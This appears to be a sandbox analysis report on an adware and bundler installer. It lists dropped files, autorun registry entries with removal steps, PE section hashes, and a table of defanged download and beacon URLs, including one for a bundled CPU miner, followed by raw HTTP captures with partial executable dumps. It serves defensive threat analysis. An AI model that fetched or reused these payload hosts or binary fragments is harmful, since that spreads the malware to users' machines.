%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source2036_26711\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp (7314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010095\gmsd_re_005010095\1.20\cnf.cyl (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6895.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-JSNSO.tmp\nss2D.tmp (3781 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\encrypt.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\is-02VBD.tmp (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\is-7FIQF.tmp (8657 bytes)
%Program Files%\gmsd_re_005010095\gamesdesktop_widget.exe (77005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\gmsd_re_005010095\is-FIG3R.tmp (22284 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010095\upgmsd_re_005010095.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\is-F0BR9.tmp (2105 bytes)
%Program Files%\gmsd_re_005010095\unins000.dat (29605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\gamesdesktop_widget.7z (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\is-P30K2.tmp (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\gmsd_re_005010095.7z (8657 bytes)
%Program Files%\gmsd_re_005010095\gmsd_re_005010095.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\ex.bat (1564 bytes)
%Program Files%\gmsd_re_005010095\unins000.msg (375 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\is-JFB3K.tmp (15278 bytes)
%Program Files%\gmsd_re_005010095\predm.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\upgmsd_re_005010095.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\itdownload.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-3D1GP.tmp\CheckProc.cmd (288 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010095.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010095\upgmsd_re_005010095.exe -runhelper"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010095" = "%Program Files%\gmsd_re_005010095\gmsd_re_005010095.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
| .rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
| .data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
| .ndata | 192512 | 921600 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 1114112 | 1736 | 2048 | 2.02132 | 4af0600f577d7f64188b9f45dee90736 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 344
a5b362eaa5107233922d116064150b18
9ff8edb75794b91ea1849214e6ee377d
d81d5608ee051193cb414b623204ca2b
ff9206b73c90baa98ac67bd7dd72c5ca
574eb0e0104c14912a4029308e8bd9b6
4ffebd3e4e6d2c800ffb9d9f84f8a5cb
bd3438c3dde4aabbf901a55740958952
d5abbfdf5c541f8657a0989aa8c01036
07b8b896d1df713b168fb35fc1cdd003
db205e63f226072be250a9a94dfa3731
158a98a822f798bdb94723f9e1935623
fa58b09759639026299fe8d086b5c09d
692c8facf0591a41e8cb4be1671df672
9811196d1d42348220f9e9a2f9a4e3e8
2fae92324f64572d31a3a7ecd0590ce6
8bb9a9dea9311671e06482f9ec5318aa
c0c5cc8755825eaba05a4d361348392f
9a443574ea12da2f8cf331a9ba2ee28e
13166571a71af6a4221b72622dab8807
e727b97c7a7678a5c01f34c2a5633e76
26ed1b8284dc924e77b7c0588b4520f3
95a41fde49afb72046898a866001a95e
d27ee18d95dc184ee4d8d3791e6417d5
94aa7dbedeb69b99e633b79adec3428c
45ca65981b3c3e945b0e4cdc53db9ba2
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ | 54.235.132.107 |
| hxxp://download-servers.com/SysInfo/Validate.exe | 50.7.86.74 |
| hxxp://download-servers.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 50.7.86.74 |
| hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe | 54.192.200.86 |
| hxxp://download-servers.com/SysInfo/validator/timer.php | 50.7.86.74 |
| hxxp://cds.c5z6s5a3.hwcdn.net/69/all/cp/row/setup.exe | |
| hxxp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe | 54.239.168.251 |
| hxxp://ipgeoapi.com/ | 54.197.235.183 |
| hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=6895 | |
| hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=7900 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=2620 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=5571 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=8217 | |
| hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.004 | |
| hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.001 | |
| hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.003 | |
| hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.002 | |
| hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.005 | |
| hxxp://cds.r5q6q4j7.hwcdn.net/CPUminer/v6/Bundle_CPUminer.exe | |
| hxxp://dl.tuto4pc.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=9825 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=183 | |
| hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US | 37.187.146.35 |
| hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=141783&tag=RE_CLICKMEIN_INSTALL_INI | 37.187.152.38 |
| hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi | 37.187.146.35 |
| hxxp://ads.under-myscreen.be/cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc | 188.165.222.86 |
| hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=141783&tag=RE_CLICKMEIN_INSTALL_F11 | 37.187.152.38 |
| hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=141783&tag=RE_CLICKMEIN_INSTALL_FIN | 37.187.152.38 |
| hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=141783&tag=RE_CLICKMEIN_COUNT1 | 37.187.152.38 |
| hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=141783&tag=RE_CLICKMEIN_DCOUNT1 | 37.187.152.38 |
| hxxp://d10huri5h4o4a3.cloudfront.net/smt.exe | 54.239.168.182 |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=4838 | |
| hxxp://d27foqb3kkzkt9.cloudfront.net/sdk/binsis/2.2/BiTool.dll | 54.239.168.175 |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=726 | |
| hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=4145 | |
| hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/get_pre_offering_checks?uid=0935018A1F474F0AA5C4C276D894F821&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNzAgMTMgYjYgYzEgMWMgYmQtYjAgMjkgOWEgMWYgNzggZmQgNTUgYTMgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 | 54.192.201.187 |
| hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/xml?uid=0935018A1F474F0AA5C4C276D894F821&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNzAgMTMgYjYgYzEgMWMgYmQtYjAgMjkgOWEgMWYgNzggZmQgNTUgYTMgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 | 54.192.201.187 |
| hxxp://d2fpsq9kg43yka.cloudfront.net/installers/bi_downloader/1443013514595/setup.exe | 54.192.200.86 |
| hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=2620 | 54.231.8.172 |
| hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.002 | 69.16.175.10 |
| hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 95.211.189.16 |
| hxxp://dl.staticclientstorage.com/69/all/cp/row/setup.exe | 69.16.175.42 |
| hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.001 | 69.16.175.10 |
| hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=726 | 54.231.8.172 |
| hxxp://livestatscounter.com/SysInfo/validator/timer.php | 95.211.189.16 |
| hxxp://sub.spirlymo.com/installers/bi_downloader/1443013514595/setup.exe | 54.239.168.245 |
| hxxp://prof.youandmeandmeandyouhihi.com/cgi-bin/get_protect.cgi | 37.187.148.132 |
| hxxp://mystats.rgbdomsrv.com/installer.gif?action=started&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=7900 | 54.231.2.220 |
| hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=4838 | 54.231.8.172 |
| hxxp://www.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe | 205.185.216.10 |
| hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.004 | 69.16.175.10 |
| hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=8217 | 54.231.8.172 |
| hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=183 | 54.231.8.172 |
| hxxp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe | 176.31.126.119 |
| hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=4145 | 69.16.175.42 |
| hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.005 | 69.16.175.10 |
| hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=9825 | 54.231.8.172 |
| hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=5571 | 54.231.8.172 |
| hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=6895 | 69.16.175.42 |
| hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.003 | 69.16.175.10 |
| www.downloadsoup.com | 54.243.139.119 |
| s3.amazonaws.com | 54.231.64.0 |
| upd.adskyforever.com | 37.187.147.141 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /smt.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d10huri5h4o4a3.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 211114
Connection: keep-alive
Date: Fri, 14 Aug 2015 19:47:15 GMT
Last-Modified: Wed, 25 Feb 2015 18:08:27 GMT
ETag: "20f288aa7d995a4bfcb240b66383ebf4"
Accept-Ranges: bytes
Server: AmazonS3
Age: 35684
X-Cache: Hit from cloudfront
Via: 1.1 ad1289c08e15a848e5c2bc019529785a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: EKSHo721g1QKy34eLBPHR_kTKbwYqxz0jYd4sHNcN5PP1IduGbJ92Q==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t....... ...f...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...0...............................rsrc....f... ...h...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:45:43 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Wed, 23 Sep 2015 14:45:43 GMT..Connection: keep-alive..Content-Type: application/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codename Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..
GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Wed, 23 Sep 2015 14:45:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.24
36c..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=som-tot-cpm-crb-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe.. /installapp..hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /idn /ch=NOCHPC..hXXp://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe.. /ci 12216..hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe../VERYSILENT..hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe..hXXp://d10huri5h4o4a3.cloudfront.net/policyname.exe.. /vpol=som..http://VVV.codec13sudha.com/download.php?l4J9dw==..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..hXXp://download-servers.com/anyprotect/nosig/AnyProtectSetup.exe../s..0..HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Wed, 23 Sep 2015 14:45:39 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.24..36c..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=som-tot-cpm-crb-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe.. /installapp..https://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /idn /ch=NOCHPC..hXXp://VVV.software-forus.com/CPUminer/v6/Bundle_CPUmin
<<< skipped >>>
GET /SysInfo/validator/timer.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Wed, 23 Sep 2015 14:45:40 GMT
Content-Type: application/octet-stream
Content-Length: 165898
Connection: keep-alive
X-Powered-By: PHP/5.5.24
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=56xtF.exe
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................P...............................................t.......@...............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...P...............................rsrc........@.......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=6895 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 23 Sep 2015 14:45:44 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1443019544.dop004.fr7.t,1443019544.cds054.fr7.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Wed, 23 Sep 2015 14:45:44 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1443019544.dop004.fr7.t,1443019544.cds054.fr7.c..GIF89a.............,...........D..;..
GET /SysInfo/Validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Wed, 23 Sep 2015 14:45:38 GMT
Content-Type: application/octet-stream
Content-Length: 61981
Last-Modified: Fri, 15 May 2015 22:16:55 GMT
Connection: keep-alive
ETag: "55567057-f21d"
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@.......................... ...............................................t...........C...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....C.......D...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h 